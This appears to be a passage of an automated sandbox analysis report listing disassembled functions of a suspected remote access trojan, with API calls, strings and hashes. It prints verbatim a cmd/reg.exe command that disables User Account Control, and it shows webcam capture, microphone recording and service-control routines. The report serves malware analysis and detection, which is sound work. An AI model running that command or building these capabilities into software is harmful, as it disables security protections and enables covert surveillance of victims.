API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$e]j[/$mscoree.dll
API String ID: 4061214504-2144798790
Opcode ID: cfbbdf30ec96b6666769d195f1efe458a00f065bb439fa98bb073361271b6784
Instruction ID: 0a8d3f567fe41ef9be558500660f8c42ae883db5e601ee7dbbda2c1d2cd30ed9
Opcode Fuzzy Hash: cfbbdf30ec96b6666769d195f1efe458a00f065bb439fa98bb073361271b6784
Instruction Fuzzy Hash: EAF0A431900618BBDB10AF61DC09BAEBFB4DB04756F510275F905A2261CB74CE54CA98

Function 0043887C Relevance: 9.3, APIs: 6, Instructions: 284COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 00438A09
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A25
__allrem.LIBCMT ref: 00438A3C
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A5A
__allrem.LIBCMT ref: 00438A71
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A8F

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: a5bb698a37765ca5ad947defe33ca2ea1dc364bfd829a3e03f22b831f39bfe5b
Instruction ID: 1db505a437643d25cad1e1ab06004ebe691486694b679651004c0d70fbe8f9c1
Opcode Fuzzy Hash: a5bb698a37765ca5ad947defe33ca2ea1dc364bfd829a3e03f22b831f39bfe5b
Instruction Fuzzy Hash: CD815972A007069BE724BA29CC41B6BF3E8AF49328F14512FF511D6382EF78D900875D

Function 00442E0B Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 00442E37
__cftoe.LIBCMT ref: 00442E69

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: 0fae115f831cac106012114eb4540e124d695819a26846d31b7a5b9ad28ad3e8
Instruction ID: 4563a9c63fae0d6d7f7aa9a83d474a3ec136fb2d14012502de5dff0b8c27d610
Opcode Fuzzy Hash: 0fae115f831cac106012114eb4540e124d695819a26846d31b7a5b9ad28ad3e8
Instruction Fuzzy Hash: CB510C32500205ABFB209F598E45EAF77B8EF48334FE0421FF415D6282EB79D941966C

Function 0040F8B7 Relevance: 9.1, APIs: 6, Instructions: 75COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040F8C4
int.LIBCPMT ref: 0040F8D7

Part of subcall function 0040CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0040CAFA
Part of subcall function 0040CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB14

std::_Facet_Register.LIBCPMT ref: 0040F917
std::_Lockit::~_Lockit.LIBCPMT ref: 0040F920
__CxxThrowException@8.LIBVCRUNTIME ref: 0040F93E
__Init_thread_footer.LIBCMT ref: 0040F97F

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
String ID:
API String ID: 3815856325-0
Opcode ID: 296aa1fc45bd8a97e11338d30c2ad026eda8063a32206ad78c4166fd1b77079b
Instruction ID: 3bb9722abb9e04fd13c8d4025e7ce1c878c76566b3017ce531706a3e1b7c3414
Opcode Fuzzy Hash: 296aa1fc45bd8a97e11338d30c2ad026eda8063a32206ad78c4166fd1b77079b
Instruction Fuzzy Hash: 90212232900104EBCB24EBA9E94699E7378AB08324F20017FF844B72D1DB389F458BD9

Function 00418C2E Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,00418344,00000000), ref: 00418C3E
OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,00418344,00000000), ref: 00418C52
CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418C5F
ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00418344,00000000), ref: 00418C94
CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418CA6
CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418CA9

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ChangeConfigManager
String ID:
API String ID: 493672254-0
Opcode ID: 6b3aada76383092df42fd9d8378ae16ca6440a91692c2fe76f90724c69c65514
Instruction ID: 151ede47f5a01f66990efdacd58a0b59027112db6305451f0336687f4909308b
Opcode Fuzzy Hash: 6b3aada76383092df42fd9d8378ae16ca6440a91692c2fe76f90724c69c65514
Instruction Fuzzy Hash: A20149711862183AE6108B389C4EEBB3A6CDB42771F14032FF925A32D1EE68CD4185F9

Function 00445725 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
_free.LIBCMT ref: 0044575C
_free.LIBCMT ref: 00445784
SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
_abort.LIBCMT ref: 004457A3

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 2164e89f114e7cf86b97a0d05c6cee2e89ce7be6ffa074a4cf04242e0fee9013
Instruction ID: 2afc6a99b93033dbed13f8def56e2284daf42193b39b630cfab03248b002a5f8
Opcode Fuzzy Hash: 2164e89f114e7cf86b97a0d05c6cee2e89ce7be6ffa074a4cf04242e0fee9013
Instruction Fuzzy Hash: 6EF0FE35100F0067FA117B367C8AB2F1A695FC2B2AF21013BF419D6293EE3DC902452D

Function 00418A5C Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,004185D9,00000000), ref: 00418A6B
OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,004185D9,00000000), ref: 00418A7F
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418A8C
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004185D9,00000000), ref: 00418A9B
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418AAD
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418AB0

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: f9d93c7612eed7e1ddf8c3953865d04e5265de3587757247bbfd6a1c47877660
Instruction ID: 4afe7732e2fa81f36ccf108e41ed7890102f29a09d0e479adccf976045b68e04
Opcode Fuzzy Hash: f9d93c7612eed7e1ddf8c3953865d04e5265de3587757247bbfd6a1c47877660
Instruction Fuzzy Hash: A4F0C2315013186BD210EBA5DC89EBF3BACDF45B96B41002BFD0993192DF38CD4689E9

Function 00418B60 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00418559,00000000), ref: 00418B6F
OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00418559,00000000), ref: 00418B83
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418B90
ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00418559,00000000), ref: 00418B9F
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418BB1
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418BB4

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: 027b45ec19db43cd3e6d09ceb5389eefa79acdbdadc7d59ed190380558829436
Instruction ID: 20460b91a854b5e3c53015269073f2e928c2deccd9acf6b4d89527a320d4dccf
Opcode Fuzzy Hash: 027b45ec19db43cd3e6d09ceb5389eefa79acdbdadc7d59ed190380558829436
Instruction Fuzzy Hash: 22F0C2715402186BD210EB65DC89EBF3BACDB45B52B81006AFE09A3192DE38DD4589E9

Function 00418BC7 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,004184D9,00000000), ref: 00418BD6
OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,004184D9,00000000), ref: 00418BEA
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418BF7
ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,004184D9,00000000), ref: 00418C06
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418C18
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418C1B

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: 60f77fd359bc8166b0f1f63c621f75235c8633bea2de10f026708dad38e6f72c
Instruction ID: 1da220ff3ffe1d32b0df5c47a21bcd1adf2661b27de4fa42f8fed5365a22baa8
Opcode Fuzzy Hash: 60f77fd359bc8166b0f1f63c621f75235c8633bea2de10f026708dad38e6f72c
Instruction Fuzzy Hash: 32F0C2715012186BD210EB65EC89DBF3BACDB45B51B41002AFE0993192DF38CD4589F9

Function 00442B2D Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 147COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00442C15
__freea.LIBCMT ref: 00442C9B

Strings

H"GH"G, xrefs: 00442B5D
e]j[/, xrefs: 00442B34
H"G, xrefs: 00442B40, 00442B60, 00442B89, 00442C65, 00442C83

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: __alloca_probe_16__freea
String ID: H"G$H"GH"G$e]j[/
API String ID: 1635606685-1312565997
Opcode ID: b6807b3a581d2ea95bf3fa3bb4dc482b4bbdf0069e2f44a64f4a5d22043e6a4b
Instruction ID: 3c870ea2fb57449e7c992ce38f4d69c2eab2d9a05dd359c3c94aeedaa7d51697
Opcode Fuzzy Hash: b6807b3a581d2ea95bf3fa3bb4dc482b4bbdf0069e2f44a64f4a5d22043e6a4b
Instruction Fuzzy Hash: F0411931A00212ABEB219F65CD82A5FB7A1EF45714F54056FF804DB291EBBCDD40879E

Function 0040966D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409745), ref: 004096A3
GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409745), ref: 004096B2
Sleep.KERNEL32(00002710,?,?,?,00409745), ref: 004096DF
CloseHandle.KERNEL32(00000000,?,?,?,00409745), ref: 004096E6

Strings

h G, xrefs: 00409698

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSizeSleep
String ID: h G
API String ID: 1958988193-3300504347
Opcode ID: 2165585e5b18e3410dae2497746dd606356f3a02818af73040aae92c32689789
Instruction ID: 1483d32ec36d41576822df3093d1b75ffc22edec2a146082987510034e162158
Opcode Fuzzy Hash: 2165585e5b18e3410dae2497746dd606356f3a02818af73040aae92c32689789
Instruction Fuzzy Hash: 24113D70201380ABD7316B749D99A2F3A9BB746304F44087EF281636D3C67D5C44C32E

Function 0041B2C4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON

Download Yara Rule

APIs

RegisterClassExA.USER32(00000030), ref: 0041B310
CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041B32B
GetLastError.KERNEL32 ref: 0041B335

Strings

0, xrefs: 0041B2E0
MsgWindowClass, xrefs: 0041B2DB

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: ClassCreateErrorLastRegisterWindow
String ID: 0$MsgWindowClass
API String ID: 2877667751-2410386613
Opcode ID: 5c8849b15fa1cc9467c1d7fb15406a30d7545ffe8e7388a5e40320623bb372a5
Instruction ID: 33db8f89e50e9671cec9701a72200cc03bcb20702a276687bfdd99081a41ce18
Opcode Fuzzy Hash: 5c8849b15fa1cc9467c1d7fb15406a30d7545ffe8e7388a5e40320623bb372a5
Instruction Fuzzy Hash: 1F0125B190031CABDB10DFE5EC849EFBBBCFB08355F40052AF810A2250E77599048AA4

Function 00437603 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 0043761A

Part of subcall function 00437C52: ___AdjustPointer.LIBCMT ref: 00437C9C

_UnwindNestedFrames.LIBCMT ref: 00437631
___FrameUnwindToState.LIBVCRUNTIME ref: 00437643
CallCatchBlock.LIBVCRUNTIME ref: 00437667

Strings

/zC, xrefs: 00437626, 00437617

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID: /zC
API String ID: 2633735394-4132788633
Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
Instruction ID: d669bc69f5b2d8c9fbf55978af89ff33433ac2085b506f133949dc977f569c90
Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
Instruction Fuzzy Hash: 44012D72004508BBCF225F56CC42EDA3BBAEF4C764F15501AFA9861220C33AE861DF98

Function 0041739D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000004C), ref: 004173AA
GetSystemMetrics.USER32(0000004D), ref: 004173B0
GetSystemMetrics.USER32(0000004E), ref: 004173B6
GetSystemMetrics.USER32(0000004F), ref: 004173BC

Strings

]tA, xrefs: 004173EB

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: MetricsSystem
String ID: ]tA
API String ID: 4116985748-3517819141
Opcode ID: 812a9219b2c6697e1b7e6c0967c7113de32af3875f372bd592213eda7148f6bd
Instruction ID: 3cbdadbf3de93f5eefc1923f71e525f4be7d9c38d0567e5d5edaddbebabc810f
Opcode Fuzzy Hash: 812a9219b2c6697e1b7e6c0967c7113de32af3875f372bd592213eda7148f6bd
Instruction Fuzzy Hash: 64F0AFB1B043254BD700EA7A8C41A6FAAE59BD4274F11443FFA09C7282EEB8DC458B94

Function 0040E501 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?,00000000,00471FFC), ref: 0040E547
CloseHandle.KERNEL32(?,?,?,?,?,00000000,00471FFC), ref: 0040E556
CloseHandle.KERNEL32(?,?,?,?,?,00000000,00471FFC), ref: 0040E55B

Strings

C:\Windows\System32\cmd.exe, xrefs: 0040E542
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040E53D

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateProcess
String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
API String ID: 2922976086-4183131282
Opcode ID: 5cb763d495b165fc4f9c66d013102bd94a78ddd016aca5e3dc924e3fee2ecf0f
Instruction ID: 9c8cd13d2f2f5b55d8ef3643fb71004f418ed3317f879fdff7c1c4061e2abca7
Opcode Fuzzy Hash: 5cb763d495b165fc4f9c66d013102bd94a78ddd016aca5e3dc924e3fee2ecf0f
Instruction Fuzzy Hash: 1AF06276D0029C7ACB20AAD7AC0DEDF7F3CEBC6B11F00005AB504A2050D5746540CAB5

Function 004050C4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00471E90,00404E5A,00000001,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 00405100
SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 0040510C
WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 00405117
CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 00405120

Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4

Strings

Connection KeepAlive | Disabled, xrefs: 004050D9

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
String ID: Connection KeepAlive | Disabled
API String ID: 2993684571-3818284553
Opcode ID: 225cf815540c87da9bddac79f5b913ec4e7dd3a96093c31c561b7671f502e72f
Instruction ID: 9f72672606b7a98fb4f6c5586ee23e87f0057564a74405461857646c77684129
Opcode Fuzzy Hash: 225cf815540c87da9bddac79f5b913ec4e7dd3a96093c31c561b7671f502e72f
Instruction Fuzzy Hash: 73F09671D047007FEB1037759D0AA6B7F98DB02315F44096EF882526E1D5B988509B5A

Function 00418D76 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4

GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00418DA8
PlaySoundW.WINMM(00000000,00000000), ref: 00418DB6
Sleep.KERNEL32(00002710), ref: 00418DBD
PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00418DC6

Strings

Alarm triggered, xrefs: 00418D7F

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: PlaySound$HandleLocalModuleSleepTime
String ID: Alarm triggered
API String ID: 614609389-2816303416
Opcode ID: bdf6e914fbef22af66a0bd792b19461622f07135ad8277a1fc3addc14a55c3ce
Instruction ID: 312fa8acbc24107594bc9953998d05cc744500d2263fe9839a2dc32143519282
Opcode Fuzzy Hash: bdf6e914fbef22af66a0bd792b19461622f07135ad8277a1fc3addc14a55c3ce
Instruction Fuzzy Hash: 9EE01226E4026037A510376A6D0FC6F2D2DDBD3B6274501AFFA04571D2D9A4080186FF

Function 00404351 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 206sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000,?), ref: 004044A4

Part of subcall function 004045E7: __EH_prolog.LIBCMT ref: 004045EC

Strings

GetFrame, xrefs: 0040457F
CloseCamera, xrefs: 0040456E
FreeFrame, xrefs: 00404590
OpenCamera, xrefs: 00404562

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: H_prologSleep
String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
API String ID: 3469354165-3547787478
Opcode ID: d4e7d27dec57a8dd34bb61c44af70be2832e73b29f213221e02055ec641ee880
Instruction ID: 7794b0ea9bf29785644917a3a4e5658b539d561772896ef264e5995737b90c85
Opcode Fuzzy Hash: d4e7d27dec57a8dd34bb61c44af70be2832e73b29f213221e02055ec641ee880
Instruction Fuzzy Hash: 5951E8B1B0420167C614BB769D5AA6E3795ABC0744F00053FFA45A77E2EF7C8D09C29E

Function 00401BC9 Relevance: 7.6, APIs: 5, Instructions: 71COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BD9
waveInOpen.WINMM(0046FAB0,000000FF,0046FA98,Function_00001CEB,00000000,00000000,00000024), ref: 00401C6F
waveInPrepareHeader.WINMM(0046FA78,00000020), ref: 00401CC3
waveInAddBuffer.WINMM(0046FA78,00000020), ref: 00401CD2
waveInStart.WINMM ref: 00401CDE

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
String ID:
API String ID: 1356121797-0
Opcode ID: 3b58d0c680de98a2238f286cb7f614a66765342de8d6d8e6ba78ff9c64c57b7c
Instruction ID: fb7f9cdbf736b3995f9a1dd050f0e4013ef0d97c015e7d4644af59ef24d86031
Opcode Fuzzy Hash: 3b58d0c680de98a2238f286cb7f614a66765342de8d6d8e6ba78ff9c64c57b7c
Instruction Fuzzy Hash: 77212C326242019BC7049FEABD0591A7BA9FB89714740943BF58DD7AB1FBF844098B0E

Function 0044C53A Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0044C543
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044C566

Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044C58C
_free.LIBCMT ref: 0044C59F
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044C5AE

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 55ab520b62cbc01e0d1004e3f78ad65e034532d4f5c4574cc0f3edc3ad35f3b1
Instruction ID: 9106a42af1dcf347f359e8079d91fbce8cfabd6158495d04cb7d137736bc8ec9
Opcode Fuzzy Hash: 55ab520b62cbc01e0d1004e3f78ad65e034532d4f5c4574cc0f3edc3ad35f3b1
Instruction Fuzzy Hash: AD0171726037257F37611AA75CC8C7F7A6DDAC6BA5319016BB904C3201EA79EE0181B8

Function 0041A17B Relevance: 7.6, APIs: 5, Instructions: 67fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041A29A,00000000,00000000,00000000), ref: 0041A1BA
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A1D7
CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A1E3
WriteFile.KERNEL32(00000000,00000000,00000000,0040649B,00000000,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A1F4
CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A201

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreatePointerWrite
String ID:
API String ID: 1852769593-0
Opcode ID: 900e91da6aef5ae1ef2d64e2906a14ebfc53969b27a9c650ee74425d8e4f4bd5
Instruction ID: 9d85e8900f1be3931a26f88ae5ac80d5e45035a8363d546858a313564ae31bc3
Opcode Fuzzy Hash: 900e91da6aef5ae1ef2d64e2906a14ebfc53969b27a9c650ee74425d8e4f4bd5
Instruction Fuzzy Hash: 0911C4712062147FE6105A249C88EFB779CEB46375F10076AF556C32D1C6698C95863B

Function 0040FBC8 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040FBD5
int.LIBCPMT ref: 0040FBE8

Part of subcall function 0040CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0040CAFA
Part of subcall function 0040CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB14

std::_Facet_Register.LIBCPMT ref: 0040FC28
std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC31
__CxxThrowException@8.LIBVCRUNTIME ref: 0040FC4F

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
String ID:
API String ID: 2536120697-0
Opcode ID: e42b24a72f1c346ef2fbe1d3cf240902612692734d8aa84a6b4d17056c7d6fbb
Instruction ID: 5713401f36b8bb0c26d90e6cd89a0375aabf3697ea4116ccadb9116029d1f595
Opcode Fuzzy Hash: e42b24a72f1c346ef2fbe1d3cf240902612692734d8aa84a6b4d17056c7d6fbb
Instruction Fuzzy Hash: 9811C172904118A7CB24EFA5D80289FB778EF44325F10417FFD44B7291DA389E4A87D8

Function 0044DB9C Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0044DBB4

